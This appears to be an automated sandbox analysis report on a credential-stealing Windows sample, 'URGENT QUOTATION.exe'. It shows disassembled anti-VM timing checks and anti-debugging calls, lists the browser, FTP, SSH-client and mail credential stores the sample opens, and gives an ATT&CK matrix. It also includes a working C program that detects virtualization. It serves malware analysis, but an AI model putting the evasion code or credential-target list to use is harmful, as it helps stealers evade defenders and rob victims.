            Source: URGENT QUOTATION.exe Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe RDTSC instruction interceptor: First address: 000000000218522C second address: 000000000218522C instructions:
                0x00000000 rdtsc
                0x00000002 xor eax, eax
                0x00000004 inc eax
                0x00000005 cpuid
                0x00000007 popad
                0x00000008 call 00007F270CB2D938h
                0x0000000d lfence
                0x00000010 mov edx, dword ptr [7FFE0014h]
                0x00000016 lfence
                0x00000019 ret
                0x0000001a sub edx, esi
                0x0000001c ret
                0x0000001d jmp 00007F270CB2D946h
                0x0000001f cmp ah, FFFFFFFFh
                0x00000022 add edi, edx
                0x00000024 dec dword ptr [ebp+000000F8h]
                0x0000002a jmp 00007F270CB2D942h
                0x0000002c cmp bx, ax
                0x0000002f cmp dword ptr [ebp+000000F8h], 00000000h
                0x00000036 jne 00007F270CB2D8EEh
                0x00000038 call 00007F270CB2D9AEh
                0x0000003d call 00007F270CB2D948h
                0x00000042 lfence
                0x00000045 mov edx, dword ptr [7FFE0014h]
                0x0000004b lfence
                0x0000004e ret
                0x0000004f mov esi, edx
                0x00000051 pushad
                0x00000052 rdtsc
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe RDTSC instruction interceptor: First address: 000000000218524C second address: 000000000218524C instructions:
                0x00000000 rdtsc
                0x00000002 lfence
                0x00000005 shl edx, 20h
                0x00000008 or edx, eax
                0x0000000a ret
                0x0000000b mov esi, edx
                0x0000000d pushad
                0x0000000e xor eax, eax
                0x00000010 inc eax
                0x00000011 cpuid
                0x00000013 bt ecx, 1Fh
                0x00000017 jc 00007F270C364061h
                0x0000001d popad
                0x0000001e call 00007F270C363C6Ah
                0x00000023 lfence
                0x00000026 rdtsc
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe RDTSC instruction interceptor: First address: 000000000218091B second address: 000000000218091B instructions:
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe RDTSC instruction interceptor: First address: 0000000002183842 second address: 0000000002183850 instructions:
                0x00000000 rdtsc
                0x00000002 mov eax, 00000001h
                0x00000007 cpuid
                0x00000009 popad
                0x0000000a pushad
                0x0000000b lfence
                0x0000000e rdtsc
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe RDTSC instruction interceptor: First address: 0000000002180A17 second address: 0000000002180A17 instructions:
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe RDTSC instruction interceptor: First address: 000000000056524C second address: 000000000056524C instructions:
                0x00000000 rdtsc
                0x00000002 lfence
                0x00000005 shl edx, 20h
                0x00000008 or edx, eax
                0x0000000a ret
                0x0000000b mov esi, edx
                0x0000000d pushad
                0x0000000e xor eax, eax
                0x00000010 inc eax
                0x00000011 cpuid
                0x00000013 bt ecx, 1Fh
                0x00000017 jc 00007F270C364061h
                0x0000001d popad
                0x0000001e call 00007F270C363C6Ah
                0x00000023 lfence
                0x00000026 rdtsc
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe RDTSC instruction interceptor: First address: 0000000000564C8B second address: 0000000000564C8B instructions:
                0x00000000 rdtsc
                0x00000002 lfence
                0x00000005 shl edx, 20h
                0x00000008 or edx, eax
                0x0000000a popad
                0x0000000b xor word ptr [eax+ebx], cx
                0x0000000f cmp ebx, 0000033Dh
                0x00000015 jnl 00007F270CB2D94Bh
                0x00000017 add ebx, 02h
                0x0000001a jmp 00007F270CB2D8FCh
                0x0000001c jmp 00007F270CB2D946h
                0x0000001e pushad
                0x0000001f lfence
                0x00000022 rdtsc
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021853EC rdtsc 0_2_021853EC
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe TID: 6884 Thread sleep count: 91 > 30
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe TID: 6660 Thread sleep time: -60000s >= -30000s
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Last function: Thread delayed
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Last function: Thread delayed
            Source: URGENT QUOTATION.exe Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
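            The listings above are the standard CPUID/RDTSC timing probe. rdtsc is fenced with lfence so it is not reordered, EDX:EAX is joined into a 64-bit counter (shl edx, 20h; or edx, eax), a CPUID leaf 1 (xor eax, eax; inc eax; cpuid) sits between two reads because CPUID forces an exit to the hypervisor on every virtualization platform, and bit 31 of ECX after that CPUID (bt ecx, 1Fh) is the hypervisor-present flag. The first listing additionally reads the low dword of KUSER_SHARED_DATA.SystemTime at 0x7FFE0014 and accumulates deltas in edi across a counted loop ([ebp+F8h]), which is the repeated "hammering" the signature name refers to. The C below is an added example and is not code from the sample or from the report: it performs the same measurement with compiler intrinsics and keeps the verdict separate from the sampling so the decision logic can be exercised with constructed cycle counts. The 1000-cycle threshold and the round count are assumptions chosen for illustration; the sample's real cut-off is not recoverable from the report, and the Windows-specific KUSER_SHARED_DATA read is not reproduced. The last listing (xor word ptr [eax+ebx], cx in a loop bounded by 0x33D) is a decryption loop with rdtsc interleaved, not a timing check, and is left out.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#if defined(__x86_64__) || defined(__i386__)
#include <cpuid.h>      /* __get_cpuid */
#include <x86intrin.h>  /* __rdtsc */
#define HAVE_X86 1
#else
#define HAVE_X86 0      /* not x86: the sampling functions report 0 */
#endif

/* CPUID.01H:ECX[31], the hypervisor-present flag the sample tests with
 * `xor eax, eax; inc eax; cpuid; bt ecx, 1Fh`. Returns 1 under a
 * hypervisor that advertises itself, 0 otherwise or if leaf 1 is absent. */
int hypervisor_bit_set(void)
{
#if HAVE_X86
    unsigned int eax, ebx, ecx, edx;
    if (!__get_cpuid(1, &eax, &ebx, &ecx, &edx))
        return 0;
    return (int)((ecx >> 31) & 1u);
#else
    return 0;
#endif
}

/* One sample: TSC cycles consumed by a single CPUID. CPUID unconditionally
 * traps to the hypervisor, so the delta is roughly an order of magnitude
 * larger on a VM than on bare metal. __rdtsc already joins EDX:EAX into 64
 * bits, the sample's `shl edx, 20h; or edx, eax`. CPUID is serializing, so
 * the lfence the sample places around rdtsc is unnecessary here. */
uint64_t cpuid_cycles(void)
{
#if HAVE_X86
    unsigned int eax, ebx, ecx, edx;
    uint64_t t0 = __rdtsc();
    __get_cpuid(1, &eax, &ebx, &ecx, &edx);
    uint64_t t1 = __rdtsc();
    return t1 - t0;
#else
    return 0;
#endif
}

/* The sample runs its probe in a counted loop and accumulates the deltas in
 * edi before deciding. Same idea: mean of the samples against a threshold.
 * The threshold is an assumption for this example. Returns 1 when the
 * mean exceeds it (virtualized), else 0; an empty sample set is "not VM". */
int looks_virtualized(const uint64_t *samples, size_t n, uint64_t threshold)
{
    if (n == 0)
        return 0;
    uint64_t total = 0;
    for (size_t i = 0; i < n; i++)
        total += samples[i];
    return (total / n) > threshold;
}

int main(void)
{
    enum { ROUNDS = 32 };
    uint64_t samples[ROUNDS];
    uint64_t mean = 0;
    for (int i = 0; i < ROUNDS; i++) {
        samples[i] = cpuid_cycles();
        mean += samples[i];
    }
    mean /= ROUNDS;
    printf("hypervisor bit: %d, mean cpuid cost: %llu cycles, verdict: %s\n",
           hypervisor_bit_set(), (unsigned long long)mean,
           looks_virtualized(samples, ROUNDS, 1000) ? "virtualized" : "bare metal");
    return 0;
}
```

            Build with gcc or clang on x86; on MSVC the equivalents are __cpuid and __rdtsc from intrin.h. A CPUID typically costs a few hundred cycles on bare metal and well over a thousand when it exits to a hypervisor, which is why the loop-and-accumulate form is enough for the sample's purposes and why running this inside a sandbox trips the same "RDTSC time measurements" signature.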

            Anti Debugging:

            Contains functionality to hide a thread from the debugger
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218613D NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,02182537,?,00000000,00000000,? 0_2_0218613D (ThreadInformationClass 0x11 is ThreadHideFromDebugger)
            Hides threads from debuggers
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Thread information set: HideFromDebugger (3 occurrences)
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process queried: DebugPort (3 occurrences)
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021853EC rdtsc 0_2_021853EC
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021830FC LdrInitializeThunk, 0_2_021830FC
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02182BF7 mov eax, dword ptr fs:[00000030h] 0_2_02182BF7
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218182B mov eax, dword ptr fs:[00000030h] 0_2_0218182B
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021846D2 mov eax, dword ptr fs:[00000030h] 0_2_021846D2
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021846D7 mov eax, dword ptr fs:[00000030h] 0_2_021846D7
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02181F7A mov eax, dword ptr fs:[00000030h] 0_2_02181F7A
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02181F7D mov eax, dword ptr fs:[00000030h] 0_2_02181F7D
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218578B mov eax, dword ptr fs:[00000030h] 0_2_0218578B
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218578F mov eax, dword ptr fs:[00000030h] 0_2_0218578F
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021857AE mov eax, dword ptr fs:[00000030h] 0_2_021857AE
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02181FAF mov eax, dword ptr fs:[00000030h] 0_2_02181FAF
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021857C9 mov eax, dword ptr fs:[00000030h] 0_2_021857C9
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021857E7 mov eax, dword ptr fs:[00000030h] 0_2_021857E7
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02181D7E mov eax, dword ptr fs:[00000030h] 0_2_02181D7E
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02184DA0 mov eax, dword ptr fs:[00000030h] 0_2_02184DA0
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02184DA3 mov eax, dword ptr fs:[00000030h] 0_2_02184DA3
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00564DA3 mov eax, dword ptr fs:[00000030h] 4_2_00564DA3
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00564DA0 mov eax, dword ptr fs:[00000030h] 4_2_00564DA0
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_005646D7 mov eax, dword ptr fs:[00000030h] 4_2_005646D7
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_005646D2 mov eax, dword ptr fs:[00000030h] 4_2_005646D2
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_005657C9 mov eax, dword ptr fs:[00000030h] 4_2_005657C9
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00562BF3 mov eax, dword ptr fs:[00000030h] 4_2_00562BF3
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_005657E7 mov eax, dword ptr fs:[00000030h] 4_2_005657E7
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00562BE1 mov eax, dword ptr fs:[00000030h] 4_2_00562BE1
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_0056578F mov eax, dword ptr fs:[00000030h] 4_2_0056578F
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_0056578B mov eax, dword ptr fs:[00000030h] 4_2_0056578B
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_005657AE mov eax, dword ptr fs:[00000030h] 4_2_005657AE
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process token adjusted: Debug
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_0056216A RtlAddVectoredExceptionHandler,NtProtectVirtualMemory,LdrInitializeThunk,NtProtectVirtualMemory, 4_2_0056216A
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process created: C:\Users\user\Desktop\URGENT QUOTATION.exe 'C:\Users\user\Desktop\URGENT QUOTATION.exe'
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02180701 cpuid 0_2_02180701
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl (the vendor key under which WinSCP stores its configuration)
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Tries to harvest and steal ftp login credentials
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
            Tries to steal Mail credentials (via file access)
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

            Mitre Att&ck Matrix

            One tactic per line, techniques in the report's row order; the digits the report attaches to a technique (e.g. "Process Injection (11)") are its own markers and are kept as printed.
            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts
            Execution: Windows Management Instrumentation; Scheduled Task/Job; At (Linux); At (Windows)
            Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac)
            Privilege Escalation: Process Injection (11); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac)
            Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (22); Process Injection (11); Obfuscated Files or Information (1)
            Credential Access: OS Credential Dumping (2); Credentials in Registry (1); Security Account Manager; NTDS
            Discovery: Security Software Discovery (621); Virtualization/Sandbox Evasion (22); Remote System Discovery (1); System Information Discovery (213)
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model
            Collection: Email Collection (1); Archive Collected Data (1); Data from Local System (2); Input Capture
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer
            Command and Control: Encrypted Channel (1); Ingress Tool Transfer (2); Non-Application Layer Protocol (3); Application Layer Protocol (13)
            Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap
            Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
            Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud

            Behavior Graph


            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET